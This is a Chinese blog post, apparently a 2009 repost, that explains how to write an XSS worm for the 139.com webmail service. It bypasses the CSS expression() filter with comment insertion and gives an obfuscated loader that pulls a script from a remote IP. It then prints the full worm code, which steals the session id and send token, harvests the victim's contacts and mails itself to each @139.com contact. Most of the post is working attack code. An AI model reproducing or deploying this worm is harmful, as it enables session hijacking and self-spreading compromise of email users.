Load... 注册 | 登陆

139邮箱蠕虫编写实例

Posted by admin on 2009-12-27 10:33. Filed in 网络转载

原文链接:http://www.woyigui.cn/139-mail-worm/

原理分析:
     我们经常会用到的mail.139.com,由于对邮件正文过滤不严,导致存在xss漏洞。他们尽管实现了对style="xss:expression"进行过滤,但是可以通过添加/*  */绕过,如:

 

XML/HTML代码
  1. <IMG STYLE="xss:expr/*xss*/ession(alert(/xss/))">  

在添加/* */后,该脚本能够在IE浏览器执行。
同时,经过分析发现,mail.139.com中发送邮件的功能存在CSRF弱点;可以通过Ajax技术获取发送邮件所需要的mid值。另外邮箱的“通信录“中的联系人邮件可以直接通过javascript取出。
满足了编写csrf worm的3个条件,接下来的工作,就是通过编写javascript代码来实现了。

跨站代码:
该部分要实现的功能就是,触发浏览器去读取远端的js脚本,并且执行该脚本:
Original:

XML/HTML代码
  1. var ig =document.createElement("script");ig.src=" http://192.168.9.104/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);}   

对该部分编码按照10进制进行编码,以避免关键字被替换,并调用:

ASP/Visual Basic代码
  1. <IMG STYLE="xss:expr/*xss*/ession(eval(String.fromCharCode(118, 97, 114, 32, 105, 103, 32, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 105, 103, 46, 115, 114, 99, 61, 34, 32, 104, 116, 116, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 57, 46, 49, 48, 52, 47, 119, 111, 121, 105, 103, 117, 105, 47, 49, 51, 57, 46, 106, 115, 34, 59, 116, 114, 121, 32, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 98, 111, 100, 121, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 105, 103, 41, 59, 125, 32, 99, 97, 116, 99, 104, 32, 40, 101, 41, 32, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 99, 117, 109, 101, 110, 116, 69, 108, 101, 109, 101, 110, 116, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 98, 111, 100, 121, 34, 41, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 98, 111, 100, 121, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 105, 103, 41, 59, 125)))">   

该部分代码,需放置在邮件正文中传送。

脚本功能的实现:

主要实现了如下功能:
1.通过脚本,读取联系人的邮箱地址。
  该部分信息,可以通过top.LinkManList.concat()获取。
2.通过脚本,获取sid值
  该部分信息,可以通过window.top.location.href,配合正则表达式获取到。
3.获取发送邮件所需要的mid值
  在获取到sid值后,通过script打开"写邮件"页面,读取mid值。
4.发送邮件
  发送邮件功能只验证mid值,因此在获取到正确的mid值后,连同获取到的联系人一起,构造post数据,发送邮件。
5.改写邮件转发规则和自动回复规则
  在有正确的sid后,构造post。

完整代码:

JavaScript代码
  1. var xssed = false;   
  2. if (typeof XSSflag != "undefined"){   
  3.   xssed = true;   
  4. }   
  5. var XSSflag = [   
  6.   {name: "version", url: "1.0"},   
  7. ];   
  8. if ( xssed != true ) {     
  9.   var xmlhttp;   
  10.   //create XHR   
  11.   function createXMLHttp(){      
  12.       try {   
  13.         xmlhttp = new XMLHttpRequest();   
  14.       } catch (e) {   
  15.          var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',   
  16.                      'MSXML2.XMLHTTP.4.0',   
  17.                      'MSXML2.XMLHTTP.3.0',   
  18.                      'MSXML2.XMLHTTP',   
  19.                      'Microsoft.XMLHTTP' );   
  20.         var success = false;   
  21.         for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {   
  22.           try {   
  23.              xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);   
  24.               success = true;   
  25.           } catch (e) {}   
  26.         }   
  27.         if (!success) {   
  28.           throw new Error('Unable to create XMLHttpRequest.');   
  29.         }   
  30.      }    
  31.   }   
  32.   function domid (dourl) {   
  33.     createXMLHttp();      
  34.     var tmp = "";   
  35.     xmlhttp.open("GET", dourl, false);      
  36.     xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");   
  37.     xmlhttp.setRequestHeader("Connection""close");   
  38.     xmlhttp.send(null);   
  39.     setTimeout( tmp = xmlhttp.responseText,500);   
  40.     return tmp;       
  41.   }   
  42.   function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){      
  43.     createXMLHttp();      
  44.     var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype=send.x&idOpType=&text="+ Content +"&destcgi=&funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year=&month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent=y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0";    
  45.     xmlhttp.open("POST", doUrl, false);      
  46.     xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");   
  47.     xmlhttp.setRequestHeader("Content-length", params.length);   
  48.     xmlhttp.setRequestHeader("Connection""close");   
  49.     xmlhttp.send(params);   
  50.   }   
  51.   function doMyAjax()      
  52.   {      
  53.      var strPer = '/coremail/cgi/attachfapps';   
  54.      var tomail = '<woyigui_test@139.com>;';   
  55.      var subject = "test20";   
  56.      var Content = "<img style=\"a:expr/**/ession(eval(String.fromCharCode(9,118,97,114,32,105,103,32,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,13,10,9,105,103,46,115,114,99,61,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,57,46,49,48,52,47,119,111,121,105,103,117,105,47,49,51,57,46,106,115,34,59,13,10,9,116,114,121,32,123,13,10,9,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,105,103,41,59,13,10,9,125,32,99,97,116,99,104,32,40,101,41,32,123,13,10,9,9,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,98,111,100,121,34,41,41,59,13,10,9,9,9,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,105,103,41,59,13,10,9,125)))\">";   
  57.      var account = "";   
  58.      var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1");   
  59.      var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid );      
  60.      var mid="",text="";   
  61.      text=tmpmid.split("\n");   
  62.     for (var i=0;i < text.length; i++)   
  63.     {   
  64.       var patt=/name=\"mid\" value=\"/;  
  65.       if ( patt.test(text[i]))  
  66.       {    
  67.         mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1");  
  68.         break;  
  69.       }  
  70.     }  
  71.     var mail_address=top.LinkManList.concat();  
  72.     for (var i=0,len=mail_address.length;i<len;i++)  
  73.     {  var mail=mail_address[i];  
  74.       var reg_139=/@139\.com/;  
  75.       if ( reg_139.test(mail.addr)){  
  76.         tomail += "<"+mail.addr+">;";  
  77.       }  
  78.     }  
  79.      try {  
  80.        startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject), encodeURIComponent(Content), encodeURIComponent(account), mid, sid );      
  81.      } catch (e) {  
  82.        alert("send data error!");   
  83.      }   
  84.   }   
  85.   doMyAjax();   
  86. }   

« 上一篇 | 下一篇 »

Leave a Comment

评论内容 (必填):